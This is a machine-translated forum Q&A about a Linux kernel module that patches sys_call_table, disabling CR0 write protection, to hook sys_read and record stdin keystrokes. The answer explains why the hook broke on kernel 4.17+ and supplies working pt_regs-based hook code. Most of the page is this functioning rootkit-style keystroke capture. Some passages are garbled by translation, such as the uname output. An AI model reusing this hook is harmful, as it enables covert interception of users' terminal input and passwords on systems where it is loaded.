这个模块完全劫持了用户的控制台:https://pastebin.com/99YJFnaq
它是Linux内核4.12,Kali 2018.1。
现在,我已经安装了最新版本的Kali - 2019.1。它使用内核4.19:
Linux时间4.19.0-times1-amd64#1 Debian Middle School 4.19.13-1 times1(2019-01-03)x86_64 GNU / Linux
我试图抓住任何东西,但流程中不存在fd == 0。
changelogs
on different resources...
我发现了这样的模块kpti
,可能会做类似的事情,但这个模块没有安装在Kali 2019.1中。
请帮助我找到hacked_read
在这段代码中停止听到sys_read()
的确切原因:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#define BUFFER_SIZE 512
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <[email protected]>" );
static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;
static inline void rw_enable( void ) {
asm volatile ( "cli \n"
"pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
"sti "
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( fd, buf, count );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( fd, buf, count );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
int hacked_read_init( void ) {
register uint64_t cr0;
info( "Module was loaded\n" );
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
info( "Module was unloaded\n" );
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = original_read;
rw_disable( cr0 );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile文件:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
@rm -f *.o .*.cmd .*.flags *.mod.c *.order
@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
@rm -fR .tmp*
@rm -rf .tmp_versions
我确信像以前一样的东西一直在调用sys_read()
。 tee
,bash
,vi
- 所有这些东西都不能在这么短的时间内改变,但是linux-kernel
。
我会欣赏代码绕过。
一些故障排除显示以下内容:
read()
。他们仍然一直在呼唤它。sys_read()
的指针成功替换了指向hacked_read_test()
的指针。read()
系统调用就好像它是原始模块一样。4.16
和4.16.2
之间(即2018年4月1日至2018年4月12日之间)。考虑到这一点,我们有非常狭窄的提交列表要检查,并且更改可能在系统调用机制中。好吧,看起来像this commit is what we are looking for(还有更多)。
这个提交的关键部分是它改变了SYSCALL_DEFINEx
定义的函数的签名,以便它们接受a pointer to struct pt_regs而不是syscall参数,即sys_read(unsigned int fd, char __user * buf, size_t count)
变成sys_read(const struct pt_regs *regs)
。这意味着,hacked_read_test(unsigned int fd, char *buf, size_t count)
不再是sys_read()
的有效替代品!
因此,使用新内核,您可以用sys_read(const struct pt_regs *regs)
替换hacked_read_test(unsigned int fd, char *buf, size_t count)
。为什么这不会崩溃,而是像原来的sys_read()
一样工作?再次考虑hacked_read_test()
的简化版本:
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
if ( fd != 0 ) {
return original_read( fd, buf, count );
} else {
// ...
}
}
好。第一个函数参数通过%rdi
寄存器传递。 sys_read()
的调用者将指向struct pt_regs
的指针放入%rdi
并执行调用。执行流程在hacked_read_test()
内部,并检查第一个参数fd
是否为零。考虑到这个参数包含一个有效的指针而不是文件描述符,这个条件成功,控制流直接转到original_read()
,它接收fd
值(实际上,指向struct pt_regs
的指针)作为第一个参数,反过来,然后成功使用,因为它原本应该是。所以,因为内核4.16.2
你的hacked_read_test()
有效地工作如下:
unsigned long hacked_read_test( const struct pt_regs *regs ) {
return original_read( regs );
}
为了确保它,你可以尝试替代版本的hacked_read_test()
:
unsigned long hacked_read_test( void *ptr ) {
if ( ptr != 0 ) {
info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
return original_read( ptr );
} else {
return -EINVAL;
}
}
在编译和insmod
ing此版本后,您将获得以下内容:
invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
您可以创建hacked_read_test()
的工作版本,但似乎实现将依赖于平台,因为您必须从regs
的相应寄存器字段中提取参数(对于x86_84
,这些是%rdi
,%rsi
和%rdx
,用于1st,2nd和第三个系统调用参数)。
下面的工作x86_64
实现(在内核4.19
上测试)。
#include <asm/ptrace.h>
// ...
unsigned long ( *original_read ) ( const struct pt_regs *regs );
// ...
unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( regs );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( regs );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}